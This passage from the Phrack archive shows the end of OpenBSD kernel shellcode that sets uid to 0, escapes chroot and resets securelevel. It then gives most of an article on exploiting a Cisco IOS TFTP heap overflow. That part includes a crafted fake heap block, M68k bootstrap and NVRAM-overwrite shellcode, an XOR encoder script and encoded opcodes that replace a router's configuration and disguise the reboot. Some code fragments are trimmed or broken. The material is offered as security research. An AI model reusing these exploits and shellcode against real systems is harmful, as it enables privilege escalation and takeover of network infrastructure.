mov  0x10(%ecx),%ebx  # ebx = p_cred 
xor  %eax,%eax        # eax = 0
mov  %eax,0x4(%ebx)
# p_ruid = 0

# update pc_ucred->cr_uid
mov  (%ebx),%edx      # edx = pc_ucred
mov  %eax,0x4(%edx)
# cr_uid = 0

# update p_fd->fd_rdir to break chroot()
mov  0x14(%ecx),%edx # edx = p_fd
mov  %eax,0xc(%edx)
# p_fd->fd_rdir = 0

lea  0x68(%esp),%ebp
# set ebp to normal

# find where to return: sidt technique
sidt 0x4(%edi)
mov  0x6(%edi),%ebx   # mov _idt_region in eax
mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
mov  0x404(%ebx),%ecx # _idt_region[0x404]
shr  $0x10,%ecx
sal  $0x10,%ecx
sal  $0x10,%edx
shr  $0x10,%edx
or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end

# search for Xosyscall_end+XXX: call _syscall instruction

xor  %ecx,%ecx
inc  %ecx
movb (%edx,%ecx),%bl
cmpb $0xe8,%bl
jne  up

lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
add  $0x5,%ecx        # add 5 to displacement
add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp

# search for _syscall+0xXXX: call *%eax 
# and return to where we were supposed to!
# _syscall+0x240: ff
# _syscall+0x241: d0	0x240,0x241 on obsd3.1

mov  %ecx,%edi         # ecx is addr of _syscall
movw $0xd0ff,%ax
mov  $0xffffffff,%ecx 
scasw    #scan (%edi++) for %ax

#return to *%edi
xor  %eax,%eax  #set up the return value to Success ;)
push %edi
<--> ./ex_kernel/kernel_sc.s
<++> ./ex_kernel/secl_sc.s
# securelevel reset shellcode
# [email protected] |  [email protected]
# 2002
	.align 2,0x90
.globl _main
	.type	_main , @function
call moo
.long 0x12345678
pop  %edi
mov  (%edi),%ebx      # address of securelevel

xor  %eax,%eax        # eax = 0
mov  %eax,(%ebx)
# securelevel = 0

lea  0x68(%esp),%ebp
# set ebp to normal

# find where to return: sidt technique
sidt 0x4(%edi)
mov  0x6(%edi),%ebx   # mov _idt_region in eax
mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
mov  0x404(%ebx),%ecx # _idt_region[0x404]
shr  $0x10,%ecx
sal  $0x10,%ecx
sal  $0x10,%edx
shr  $0x10,%edx
or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end

# search for Xosyscall_end+XXX: call _syscall instruction

xor  %ecx,%ecx
inc  %ecx
movb (%edx,%ecx),%bl
cmpb $0xe8,%bl
jne  up

lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
add  $0x5,%ecx        # add 5 to displacement
add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp

# search for _syscall+0xXXX: call *%eax 
# and return to where we were supposed to!
# _syscall+0x240: ff
# _syscall+0x241: d0	OBSD3.1

mov  %ecx,%edi         # ecx is addr of _syscall
movw $0xd0ff,%ax
mov  $0xffffffff,%ecx 
scasw    #scan (%edi++) for %ax

#return to *%edi
xor  %eax,%eax  #set up the return value to Success ;)
push %edi
<--> ./ex_kernel/secl_sc.s

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x07 of 0x10

|=-------------=[ Burning the bridge: Cisco IOS exploits ]=--------------=|
|=----------------=[ FX of Phenoelit <[email protected]> ]=----------------=|

--[ Contents

  1 - Introduction and Limitations
  2 - Identification of an overflow
  3 - IOS memory layout sniplets
  4 - A free() exploit materializes
  5 - Writing (shell)code for Cisco
  6 - Everything not covered in 1-5

--[ 1 - Introduction and Limitations

This article is to introduce the reader into the fun land of exploiting a
routing device made by Cisco Systems. It is not the final word on this
toppic and merely reflects our research results.

According to Cisco Systems, around 85% of all software issues in IOS are
the direct or indirect result of memory corruptions. By the time of this
writing, yours truly is not aware of one single case, where overflowing
something in Cisco IOS led to a direct overwrite of a return address.
Although there are things like stacks in IOS, it seems to be very uncommon
for IOS coders to use local function buffers. Therefore, most (if not all)
overflows we will encounter are some way or anyother heap based.

As a fellow researcher used to say, bugs are not an unlimited resource.
Especially overflow bugs in Cisco IOS are fairly rare and not easily
compared to each other. This article will therefore limit the discussion
to one particular bug: the Cisco IOS TFTP server filename overflow. When
using your router as a TFTP server for files in the flash filesystem, a
TFTP GET request with a long (700 characters) filename will cause the
router to crash. This happens in all IOS versions from 11.1 to 11.3. The
reader might argue the point that this is no longer a widely used branch,
but yours truly asks you to bare with him to the end of this article.

The research results and methods presented here were collected during
inspection and exploitation attempts using the already mentioned TFTP bug.
By the time of this writing, other bugs are researched and different
approaches are tested, but the here presented procedure is still seen as
the most promising for widespread use. This translates to: use your
favorite private Cisco IOS overflow and try it.

--[ 2 - Identification of an overflow

While the reader is probably used to identify stack smashing in a split
second on a commonly used operating system, he might have difficulties
identifying an overflow in IOS. As yours truly already mentioned, most
overflows are heap based. There are two different ways in IOS to identify
a heap overflow when it happens. Being connected to the console, the
reader might see output like this:

01:14:16: %SYS-3-OVERRUN: Block overrun at 2C01E14 (red zone 41414141)
-Traceback= 80CCC46 80CE776 80CF1BA 80CF300
01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc
  20E3ADC,80CA1D8   20DFBE0,80CA1D8   20CF4FC,80CA1D8   20C851C,80CA1D8
  20C6F20,80CA1D8   20B43FC,80CA1D8   20AE130,80CA1D8   2075214,80CA1D8
01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc
  20651E0,80CA1D8   205EF04,80CA1D8   205B338,80CA1D8   205AB80,80CA1D8
  20AFCF8,80CA1C6   205A664,80CA1D8   20AC56C,80CA1C6   20B1A88,80CA1C6
01:14:16: %SYS-6-BLKINFO: Corrupted redzone blk 2C01E14, words 382,
  alloc 80ABBFC, InUse, dealloc 206E2F0, rfcnt 1

In this case, an IOS process called "Check heaps", of which we will hear
a lot more later, has identified a problem in the heap structures. After
doing so, "Check heaps" will cause what we call a software forced crash.
It means that the process kills the Cisco and makes it reboot in order
to get rid of the problem. We all know this behavior from users of
MS-DOS or Windows based systems. What happend here is that an A-Strip
overwrote a boundary between two heap memory blocks. This is protected by
what Cisco calls a "RED ZONE", which in fact is just a static canary.

The other way a heap overflow could manifest itself on your console is an
access violation:

*** BUS ERROR ***
access address = 0x5f227998
program counter = 0x80ad45a
status register = 0x2700
vbr at time of exception = 0x4000000
special status word = 0x0045
faulted cycle was a longword read

This is the case when you are lucky and half of the work is already done.
IOS used a value that you somehow influenced and referenced to not
readable memory.  Unfortunately, those overflows are later harder to
exploit, since tracking is a lot more difficult.

At this point in time, you should try to figure out under which exact
circumstances the overflow happens - pretty much like with every other bug
you find. If the lower limit of your buffer size changes, try to make sure
that you don't play with the console or telnet(1) connections to the router
during your tests. The best is always to test the buffer length with a just
rebooted router. While it doesn't change much for most overflows, some
react differently when the system is freshly rebooted compared to a system
in use.

--[ 3 - IOS memory layout sniplets

To get any further with the overflow, we need to look at the way IOS
organizes memory. There are basically two main areas in IOS: process memory
and IO memory. The later is used for packet buffers, interface ring buffers
and so on and can be of interest for exploitation but does not provide some
of the critical things we are looking for. The process memory on the other
hand behaves a lot like dynamic heap memory in Linux.

Memory in IOS is split up in blocks. There seems to be a number of pointer
tables and meta structures dealing with the memory blocks and making sure
IOS can access them in an efficient way. But at the end of the day, the
blocks are hold together in a linked list structure and store their
management information mostly inline. This means, every memory block has
a header, which contains information about the block, it's previous one
and the next one in the list.

 .-- | Block A      | <-.
 |   +--------------+   |
 +-> | Block B      | --+
     | Block C      |

The command "show memory processor" clearly shows the linked list

A memory block itself consists of the block header with all the inline
management information, the data part where the actual data is stored
and the red zone, which we already encountered. The format is as follows:

 |<-  32 bit  ->|        Comment
 | MAGIC        |        Static value 0xAB1234CD
 | PID          |        IOS process ID
 | Alloc Check  |	 Area the allocating process uses for checks
 | Alloc name   |        Pointer to string with process name
 | Alloc PC     |	 Code address that allocated this block
 | NEXT BLOCK   |        Pointer to the next block
 | PREV BLOCK   |        Pointer to the previous block
 | BLOCK SIZE   |        Size of the block (MSB marks "in use")
 | Reference #  |        Reference count (again ???)
 | Last Deallc  |	 Last deallocation address
 |   DATA       |
 |              |
 |              |
 | RED ZONE     |        Static value 0xFD0110DF

In case this memory block is used, the size field will have it's most
significant bit set to one. The size is represented in words (2 bytes),
and does not include the block overhead. The reference count field is
obviously designed to keep track of the number of processes using this
block, but yours truly has never seen this being something else then 1
or 0. Also, there seem to be no checks for this field in place.

In case the memory block is not used, some more management data is
introduced at the point where the real data was stored before:

 | MAGIC2       |        Static value 0xDEADBEEF
 | Somestuff    |
 | PADDING      |
 | PADDING      |
 | FREE NEXT    |        Pointer to the next free block
 | FREE PREV    |        Pointer to the previous free block
 |              |
 |              |
 | RED ZONE     |        Static value 0xFD0110DF

Therefore, a free block is an element in two different linked lists:
One for the blocks in general (free or not), another one for the list of
free memory blocks. In this case, the reference count will be zero and
the MSB of the size field is not set. Additionally, if a block was used
at least once, the data part of the block will be filled with 0x0D0D0D0D.
IOS actually overwrites the block data when a free() takes place to prevent
software issues from getting out of hand.

At this point, yours truly would like to return to the toppic of the "Check
heaps" process. It is here to run about once a minute and checks the doubly
linked lists of blocks. It basically walks them down from top to buttom to
see if everything is fine. The tests employed seem to be pretty extensive
compared to common operating systems such as Linux. As far as yours truly
knows, this is what it checks:
	1) Doest the block being with MAGIC (0xAB1234CD)?
	2) If the block is in use (MSB in size field is set), check if the
	   red zone is there and contains 0xFD0110DF.
	3) Is the PREV pointer not NULL?
	4) If there is a NEXT pointer ...
	4.1) Does it point right after the end of this block?
	4.2) Does the PREV pointer in the block pointed to by NEXT point
	     back to this block's NEXT pointer?
	5) If the NEXT pointer is NULL, does this block end at a memory
	   region/pool boundary [NOTE: not sure about this one].
	6) Does the size make sense? [NOTE: The exact test done here is
	   still unknown]

If one of these tests is not satisfied, IOS will declare itself unhappy and
perform a software forced crash. To some extend, one can find out which
test failed by taking a look at the console output line that says
"validblock_diagnose = 1". The number indicates what could be called "class
of tests", where 1 means that the MAGIC was not correct, 3 means that the
address is not in any memory pool and 5 is really a bunch of tests but
mostly indicates that the tests lined out in point 4.1 and 4.2 failed.

--[ 4 - A free() exploit materializes

Now that we know a bit about the IOS memory structure, we can plan to
overflow with some more interesting data than just 0x41. The basic idea is
to overwrite the next block header, hereby provide some data to IOS, and
let it work with this data in a way that gives us control over the CPU. How
this is usually done is explained in [1]. The most important difference
here is, that we first have to make "Check heaps" happy. Unfortunately,
some of the checks are also performed when memory is allocated or free()ed.
Therefore, slipping under the timeline of one minute between two "Check
heaps" runs is not an option here.

The biggest problems are the PREV pointer check and the size field. Since
the vulnerability we are working with here is a string overflow, we also
have the problem of not being able to use 0x00 bytes. Let's try to deal
with the issues we have one by one.

The PREV pointer has to be correct. Yours truly has not found any way to
use arbitrary values here. The check outlined in the checklist as 4.2 is a
serious problem, since it is done on the block we are sitting in - not the
one we are overflowing. To illustrate the situation:

     | Block Head   |
     | AAAAAAAAAAAA |    <--- You are here
     | RED ZONE     |    <--- Your data here
     | Block Head   |

We will call the uppermost block, who's data part we are overflowing, the
"host block", because it basically "hosts" our evildoing. For the sake of
clarity, we will call the overwritten block header the "fake block", since
we try to fake it's contents.

So, when "Check heaps" or comparable checks during malloc() and free() are
performed on our host block, the overwrite is already noticed. First of
all, we have to append the red zone canary to our buffer. If we overflow
exactly with the number of bytes the buffer can hold and append the red
zone dword 0xFD0110DF, "Check heaps" will not complain. From here one, it's
fair game up to the PREV ptr - because the values are either static (MAGIC)
or totally ignored (PID, Alloc ptrs).

Assumed we overwrite RED ZONE, MAGIC, PID, the three Alloc pointer, NEXT
and PREV, a check performed on the host block will already trigger a
software forced crash, since the PREV pointer we overwrote in the next
block does not point back to the host block. We have only one way today to
deal with this issue: we crash the device. The reason behind this is, that
we put it in a fairly predictable memory state. After a reboot, the memory
is more or less structured the same way. This also depends on the amount
of memory available in the device we are attacking and it's certainly not a
good solution. When crashing the device the first time with an A-Strip, we
can try to grab logging information off the network or the syslog server if
such a thing is configured. Yours truly is totally aware of the fact that
this prevents real-world application of the technique. For this article,
let's just assume you can read the console output.

Now that we know the PREV pointer to put into the fake block, let's go on.
For now ignoring the NEXT pointer, we have to deal with the size field. The
fact that this is a 32bit field and we are doing a string overflow prevents
us from putting reasonable numbers in there. The smallest number for a used
block would be 0x80010101 and for an unused one 0x01010101. This is much
more than IOS would accept. But to make a long story short, putting
0x7FFFFFFF in there will pass the size field checks. As simple as that.

In this particular case, as with many application level service overflows
in IOS, our host block is one of the last blocks in the chain. The most
simple case is when the host block is the next-to-last block. And viola,
this is the case with the TFTP server overflow. In other cases, the attack
involves creating more than one fake block header and becomes increasingly
complicated but not impossible. But from this point on, the discussion is
pretty much centered around the specific bug we are dealing with.

Assumed normal operation, IOS will allocate some block for storing the
requested file name. The block after that is the remaining free memory.
When IOS is done with the TFTP operation, it will free() the block it just
allocated. Then, it will find out that there are two free blocks - one
after the other - in memory. To prevent memory fragmentation (a big problem
on heavy load routers), IOS will try to coalesce (merge) the free blocks
into one. By doing so, the pointers for the linked lists have to be
adjusted. The NEXT and PREV pointers of the block before that and the block
after that (the remaining free memory) have to be adjusted to point to each
other. Additionally, the pointers in the free block info FREE NEXT and FREE
PREV have to be adjusted, so the linked list of free blocks is not broken.

Out of the sudden, we have two pointer exchange operations that could
really help us. Now, we know that we can not choose the pointer in PREV.
Although, we can choose the pointer in NEXT, assumed that "Check heaps"
does not fire before our free() tok place, this only allowes us to write
the previous pointer to any writable location in the routers memory. Being
usefull by itself, we will not look deeper into this but go on to the FREE
NEXT and FREE PREV pointers. As the focused reader surely noticed, these
two pointers are not validated by "Check heaps".

What makes exploitation of this situation extremely convenient is that
fact, that the pointer exchange in FREE PREV and FREE NEXT only relies on
the values in those two fields. What happens during the merge operation is
	+ the value in FREE PREV is written to where FREE NEXT points to
	  plus an offset of 20 bytes
	+ the value in FREE NEXT is written to where FREE PREV points to

The only thing we need now is a place to write a pointer to. As with many
other pointer based exploits, we are looking for a fairly static location
in memory to do this. Such a static location (changes per IOS image) is the
process stack of standard processes loaded right after startup. But how do
we find it?

In the IOS memory list, there is an element called the "Process Array".
This is a list of pointers - one for every process currently running in
IOS. You can find it's location by issuing a "show memory processor
allocating-process" command (output trimmed):

radio#show memory processor allocating-process

          Processor memory

 Address Bytes Prev.   Next    Ref  Alloc Proc Alloc PC  What
258AD20   1504 0       258B32C   1  *Init*     20D62F0   List Elements
258B32C   3004 258AD20 258BF14   1  *Init*     20D6316   List
258F998   1032 258F914 258FDCC   1  *Init*     20E5108   Process Array
258FDCC   1000 258F998 25901E0   1  Load Meter 20E54BA   Process Stack
25901E0    488 258FDCC 25903F4   1  Load Meter 20E54CC   Process
25903F4    128 25901E0 25904A0   1  Load Meter 20DD1CE   Process Events

This "Process Array" can be displayed by the "show memory" command:

radio#show memory 0x258F998
0258F990:                   AB1234CD FFFFFFFE          +.4M...~
0258F9A0: 00000000 020E50B6 020E5108 0258FDCC  ......P6..Q..X}L
0258F9B0: 0258F928 80000206 00000001 020E1778  .Xy(...........x
0258F9C0: 00000000 00000028 02590208 025D74C0  .......(.Y...][email protected]
0258F9D0: 02596F3C 02598208 025A0A04 025A2F34  .Yo<.Y...Z...Z/4
0258F9E0: 025AC1FC 025BD554 025BE920 025BFD2C  .ZA|.[UT.[i .[},
0258F9F0: 025E6FF0 025E949C 025EA95C 025EC484  .^op.^...^)\.^D.
0258FA00: 025EF404 0262F628 026310DC 02632FD8  .^\.c/X
0258FA10: 02634350 02635634 0263F7A8 026418C0[email protected]
0258FA20: 026435FC 026475E0 025D7A38 026507E8  .d5|.du`.]z8.e.h
0258FA30: 026527DC 02652AF4 02657200 02657518  .e'\.e*
0258FA40: 02657830 02657B48 02657E60 0269DCFC  .ex0.e{H.e~`.i\|
0258FA50: 0269EFE0 026A02C4 025DD870 00000000  .io`.j.D.]Xp....
0258FA60: 00000000 025C3358 026695EC 0266A370  .....\3X.f.l.f#p

While you also see the already discussed block header format in action now,
the interesting information starts at 0x0258F9C4. Here, you find the number
of processes currently running on IOS. They are ordered by their process
ID. What we are looking for is a process that gets executed every once in a
while. The reason for this is, if we modify something in the process data
structures, we don't want the process being active at this point in time,
so that the location we are overwriting is static. For this reason, yours
truly picked the "Load Meter" process, which is there to measure the system
load and is fired off about every 30 seconds. Let's get the PID of
"Load Meter":

radio#show processes cpu
CPU utilization for five seconds: 2%/0%; one minute: 3%; five minutes: 3%
 PID  Runtime(ms)  Invoked  uSecs    5Sec   1Min   5Min TTY Process
   1          80      1765     45   0.00%  0.00%  0.00%   0 Load Meter

Well, conveniently, this process has PID 1. Now, we check the memory
location the "Process Array" points to. Yours truly calls this memory
location "process record", since it seems to contain everything IOS needs
to know about the process. The first two entries in the record are:

radio#sh mem 0x02590208
02590200:                   0258FDF4 025901AC          .X}t.Y.,
02590210: 00001388 020E488E 00000000 00000000  ......H.........
02590220: 00000000 00000000 00000000 00000000  ................

The first entry in this record is 0x0258FDF4, which is the process stack.
You can compare this to the line above that says "Load Meter" and "Process
Stack" on it in the output of "show memory processor allocating-process".
The second element is the current stack pointer of this process
(0x025901AC). By now it should also be clear why we want to pick a process
with low activity. But surprisingly, the same procedure also works quite
well with busier processes such as "IP Input". Inspecting the location of
the stack pointer, we see something quite familiar:

radio#sh mem 0x025901AC
025901A0:                            025901C4              .Y.D
025901B0: 020DC478 0256CAF8 025902DE 00000000  ..Dx.VJx.Y.^....

This is classic C calling convention: first we find the former frame
pointer and then we find the return address. Therefore, 0x025901B0 is the
address we are targeting to overwrite with a pointer supplied by us.

The only question left is: Where do we want the return address to point to?
As already mentioned, IOS will overwrite the buffer we are filling with
0x0D0D0D0D when the free() is executed - so this is not a good place to
have your code in. On the other hand, the fake block's data section is
already considered clean from IOS's point of view, so we just append our
code to the fake block header we already have to send. But what's the
address of this? Well, since we have to know the previous pointer, we can
calculate the address of our code as offset to this one - and it turns out
that this is actually a static number in this case. There are other, more
advanced methods to deliver the code to the device, but let's keep focused.

The TFTP filename we are asking for should now have the form of:

 |              |
 |              |
 | CODE         |
 |              |

At this point, we can build the fake block using all the information we

    char                fakeblock[] =
        "\xFD\x01\x10\xDF"      // RED
        "\xAB\x12\x34\xCD"      // MAGIC
        "\xFF\xFF\xFF\xFF"      // PID
        "\x80\x81\x82\x83"      //
        "\x08\x0C\xBB\x76"      // NAME
        "\x80\x8a\x8b\x8c"      //

        "\x02\x0F\x2A\x04"      // NEXT
        "\x02\x0F\x16\x94"      // PREV

        "\x7F\xFF\xFF\xFF"      // SIZE
        "\x01\x01\x01\x01"      //
        "\xA0\xA0\xA0\xA0"      // padding
        "\xDE\xAD\xBE\xEF"      // MAGIC2
        "\x8A\x8B\x8C\x8D"      //
        "\xFF\xFF\xFF\xFF"      // padding
        "\xFF\xFF\xFF\xFF"      // padding

        "\x02\x0F\x2A\x24"      // FREE NEXT (in BUFFER)
        "\x02\x59\x01\xB0"      // FREE PREV (Load Meter return addr)

When sending this to the Cisco, you are likely to see something like this:

illegal instruction interrupt
program counter = 0x20f2a24
status register = 0x2700
vbr at time of exception = 0x4000000

depending on what comes after your fake block header. Of course, we did not
provide code for execution yet. But at this point in time, we got the CPU
redirected into our buffer.

--[ 5 - Writing (shell)code for Cisco

Before one can write code for the Cisco platform, you have to decide on the
general processor architecture you are attacking. For the purpose of this
paper, we will focus on the lower range devices running on Motorola 68k

Now the question is, what do you want to do with your code on the system.
Classic shell code design for commonly used operating system platforms uses
syscalls or library functions to perform some port binding and provide
shell access to the attacker. The problem with Cisco IOS is, that we will
have a hard time keeping it alive after we performed our pointer games.
This is because in contrast to "normal" daemons, we destroyed the memory
management of the operating system core and we can not expect it to cope
with the mess we left for it.

Additionally, the design of IOS does not feature transparent syscalls as
far as yours truly knows. Because of it's monolithic design, things are
linked together at build time. There might be ways to call different
subfunctions of IOS even after an heap overflow attack, but it appears to
be an inefficient route to take for exploitation and would make the whole
process even more instable.

The other way is to change the routers configuration and reboot it, so it
will come up with the new config, which you provided. This is far more
simpler than trying to figure out syscalls or call stack setups. The idea
behind this approach is, that you don't need any IOS functionality anymore.
Because of this, you don't have to figure out addresses and other vital
information about the IOS. All you have to know is which NVRAM chips are
used in the box and where there are mapped. This might sound way more
complicated than identifying functions in an IOS image - but is not. In
contrast to common operating systems on PC platforms, where the number of
possible hardware combinations and memory mappings by far exceedes a
feasable mapping range, it's the other way around for Cisco routers. You
can have more than ten different IOS images on a single platform - and this
is only one branch - but you always have the same general memory layout and
the ICs don't change for the most part. The only thing that may differ
between two boxes are the modules and the size of available memory (RAM,
NVRAM and Flash), but this is not of big concern for us.

The non-volatile random access memory (NVRAM) stores the configuration of a
Cisco router in most cases. The configuration itself is stored in plain
text as one continious C-style string or text file and is terminated by the
keyword 'end' and one or more 0x00 bytes. A header structure contains
information like the IOS version that created this configuration, the size
of it and a checksum. If we replace the config on the NVRAM with our own
and calculate the numbers for the header structure correctly, the router
will use our IP addresses, routings, access lists and (most important)
passwords next time it reloads.

As one can see on the memory maps [2], there are one (in the worst case
two) possible memory addresses for the NVRAM for each platform. Since
the NVRAM is mapped into the memory just like most memory chips are, we
can access it with simple memory move operations. Therefore, the only thing
we need for our "shell" code is the CPU (M68k), it's address and data bus
and the cooperation of the NVRAM chip.

There are things to keep in mind about NVRAM. First of all, it's slow to
write to. The Xicor chips yours truly encountered on Cisco routers require
that after a write, the address lines are kept unchanged for the time the
chip needs to write the data. A control register will signal when the write
operation is done. Since the location of this control register is not known
and might not be the same for different types of the same platform, yours
truly prefers to use delay loops to give the chip time to write the data -
since speed is not the attackers problem here.

Now, that we know pretty much what we want to do, we can go on and look at
the "how" part of things. First of all, you need to produce assembly for
the target platform. A little known fact is, that IOS is actually build (at
least some times) using GNU compilers. Therefore, the binutils[3] package
can be compiled to build Cisco compatible code by setting the target
platform for the ./configure run to --target=m68k-aout. When you are done,
you will have a m68k-aout-as binary, which can produce your code and a
m68k-aout-objdump to get the OP code values.

In case the reader is fluent in Motorola 68000 assembly, I would like to
apologize for the bad style, but yours truly grew up on Intel.
Optimizations and style guides are welcome. Anyway, let's start coding.

For a string overflow scenario like this one, the recommended way for small
code is to use self-modification. The main code will be XOR'd with a
pattern like 0x55 or 0xD5 to make sure that no 0x00 bytes show up. A
bootstrap code will decode the main code and pass execution on to it. The
Cisco 1600 platform with it's 68360 does not have any caching issues to
worry us (thanks to LSD for pointing this out), so the only issue we have
is avoiding 0x00 bytes in the bootstrap code. Here is how it works:

--- bootstrap.s ---
	.globl _start
        | Remove write protection for NVRAM.
	| Protection is Bit 1 in BR7 for 0x0E000000
        move.l  #0x0FF010C2,%a1
        lsr     (%a1)

        | fix the brance opcode
	| 'bne decode_loop' is OP code 0x6600 and this is bad
        lea     broken_branch+0x101(%pc),%a3
        sub.a   #0x0101,%a3
        lsr     (%a3)

        | perform dummy load, where 0x01010101 is then replaced
        | by our stack ptr value due to the other side of the pointer
	| exchange
        move.l  #0x01010101,%d1

        | get address of the real code appended plus 0x0101 to
	| prevent 0x00 bytes
        lea     xor_code+0x0101(%pc),%a2
        sub.a   #0x0101,%a2
        | prepare the decode register (XOR pattern)
        move.w  #0xD5D5,%d1

	| Decode our main payload code and the config
        eor.w   %d1,(%a2)+
	| check for the termination flag (greetings to Bine)
        cmpi.l  #0xCAFEF00D,(%a2)
        | this used to be 'bne decode_loop' or 0x6600FFF6
        .byte   0xCC,0x01,0xFF,0xF6


--- end bootstrap.s ---

You may assemble the code into an object file using:
linux# m68k-aout-as -m68360 -pic --pcrel -o bootstrap.o bootstrap.s

There are a few things to say about the code. Number one are the first two
instructions. The CPU we are dealing with supports write protection for
memory segments [4]. Information about the memory segments is stored in
so-called "Base Registers", BR0 to BR7. These are mapped into memory at
0x0FF00000 and later. The one we are interested in (BR7) is at 0x0FF010C2.
Bit0 tells the CPU if this memory is valid and Bit1 if it's write
protected, so the only thing we need to do is to shift the lower byte one
Bit to the right. The write protection Bit is cleared and the valid Bit is
still in place.

The second thing of mild interest is the broken branch code, but the
explaination in the source should make this clear: the OP code of "BNE"
unfortunately is 0x6600. So we shift the whole first word one to the right
and when the code runs, this is corrected.

The third thing is the dummy move to d1. If the reader would refer back to
the place we discussed the pointer exchange, he will notice that there is a
"back" part in this operation: namely the stack address is written to our
code plus 20 bytes (or 0x14). So we use a move operation that translates to
the OP code of 0x223c01010101, located at offset 0x12 in our code. After
the pointer exchange takes place, the 0x01010101 part is replaced by the
pointer - which is then innocently moved to the d1 register and ignored.

When this code completed execution, the appended XOR'd code and config
should be in memory in all clear text/code. The only thing we have to do
now is copy the config in the NVRAM. Here is the appropriate code to do

--- config_copy.s ---
        .globl  _start

	| turn off interrupts
        move.w	#0x2700,%sr;
	move.l	#0x0FF010C2,%a1
	move.w	#0x0001,(%a1)

	| Get position of appended config and write it with delay
	lea	config(%pc),%a2
	move.l	#0x0E0002AE,%a1
	move.l	#0x00000001,%d2

	move.b	(%a2)+,(%a1)+
	| delay loop
	move.l	#0x0000FFFF,%d1
	  subx	%d2,%d1
	  bmi	write_delay
	cmp.l	#0xCAFEF00D,(%a2)
	bne	copy_confg

	| delete old config to prevent checksum errors
	move.w	#0x0000,(%a1)+
	move.l	#0x0000FFFF,%d1
	| delay loop
	  subx	%d2,%d1
	  bmi	write_delay2
	cmp.l	#0x0E002000,%a1
	blt	delete_confg

	|  perform HARD RESET
        move.w	#0x2700,%sr
        moveal	#0x0FF00000,%a0
        moveal	(%a0),%sp
        moveal	#0x0FF00004,%a0
        moveal	(%a0),%a0
        jmp	(%a0)

--- end config_copy.s ---

There is no particular magic about this part of the code. The only thing
worth noticing is the final CPU reset. There is reason why we do this. If
we just crash the router, there might be exception handlers in place to
save the call stack and other stuff to the NVRAM. This might change
checksums in an unpredictable way and we don't want to do this. The other
reason is, that a clean reset makes the router look like it was rebooted by
an administrator using the "reload" command. So we don't raise any
questions despite the completely changed configuration ;-)

The config_copy code and the config itself must now be XOR encoded with the
pattern we used in the bootstrap code. Also, you may want to put the code
into a nice char array for easy use in a C program. For this, yours truly
uses a dead simple but efficient Perl script:

--- ---


while (<STDIN>) {
    if (/[0-9a-f]+:\t/) {
	$hexcode=~s/ //g;
	$hexcode=~s/([0-9a-f]{2})/$1 /g;


	@bytes=split(/ /,$hexcode);
	foreach (@bytes) {
		$_=$_^$pattern if($pattern);
	print "\t\"".$hexcode."\"".$tabs."//".$mnemonic." (0x".$alc.")\n";
--- end ---

You can use the output of objdump and pipe it into the script. If the
script got no parameter, it will produce the C char string without
modifications. The first optional paramter will be your XOR pattern and the
second one can be the address your buffer is going to reside at. This makes
debugging the code a hell of a lot easier, because you can refer to the
comment at the end of your C char string to find out which command made the
Cisco unhappy.

The output for our little config_copy.s code XOR'd with 0xD5 looks like
this (trimmed for phrack):

linux# m68k-aout-objdump -d config_copy.o |
> ./ 0xD5 0x020F2A24

"\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A24)
"\xF7\xA9\xDA\x25\xC5\x17"      //moveal #267391170,%a1 (0x020F2A28)
"\xE7\x69\xD5\xD4"              //movew #1,%[email protected] (0x020F2A2E)
"\x90\x2F\xD5\x87"              //lea %[email protected](62 <config>),%a2 (0x020F2A32)
"\xF7\xA9\xDB\xD5\xD7\x7B"      //moveal #234881710,%a1 (0x020F2A36)
"\xA1\xD4"                      //moveq #1,%d2 (0x020F2A3C)
"\xC7\x0F"                      //moveb %[email protected]+,%[email protected]+ (0x020F2A3E)
"\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A40)
"\x46\x97"                      //subxw %d2,%d1 (0x020F2A46)
"\xBE\xD5\x2A\x29"              //bmiw 22 <write_delay> (0x020F2A48)
"\xD9\x47\x1F\x2B\x25\xD8"      //cmpil #-889262067,%[email protected] (0x020F2A4C)
"\xB3\xD5\x2A\x3F"              //bnew 1a <copy_confg> (0x020F2A52)
"\xE7\x29\xD5\xD5"              //movew #0,%[email protected]+ (0x020F2A56)
"\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A5A)
"\x46\x97"                      //subxw %d2,%d1 (0x020F2A60)
"\xBE\xD5\x2A\x29"              //bmiw 3c <write_delay2> (0x020F2A62)
"\x66\x29\xDB\xD5\xF5\xD5"      //cmpal #234889216,%a1 (0x020F2A66)
"\xB8\xD5\x2A\x3D"              //bltw 32 <delete_confg> (0x020F2A6C)
"\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A70)
"\xF5\xA9\xDA\x25\xD5\xD5"      //moveal #267386880,%a0 (0x020F2A74)
"\xFB\x85"                      //moveal %[email protected],%sp (0x020F2A7A)
"\xF5\xA9\xDA\x25\xD5\xD1"      //moveal #267386884,%a0 (0x020F2A7C)
"\xF5\x85"                      //moveal %[email protected],%a0 (0x020F2A82)
"\x9B\x05"                      //jmp %[email protected] (0x020F2A84)

Finally, there is only one more thing to do before we can compile this all
together: new have to create the new NVRAM header and calculate the
checksum for our new config. The NVRAM header has the form of:

typedef struct {
    u_int16_t       magic;  	// 0xABCD
    u_int16_t       one;	// Probably type (1=ACII, 2=gz)
    u_int16_t       checksum;
    u_int16_t       IOSver;
    u_int32_t       unknown;	// 0x00000014
    u_int32_t       cfg_end;	// pointer to first free byte in
				// memory after config
    u_int32_t       size;
} nvhdr_t;

Obviously, most values in here are self-explainory. This header is not
nearly as much tested as the memory structures, so IOS will forgive you
strange values in the cfg_end entry and such. You can choose the IOS
version, but yours truly recommends to use something along the lines of
0x0B03 (11.3), just to make sure it works. The size field covers only the
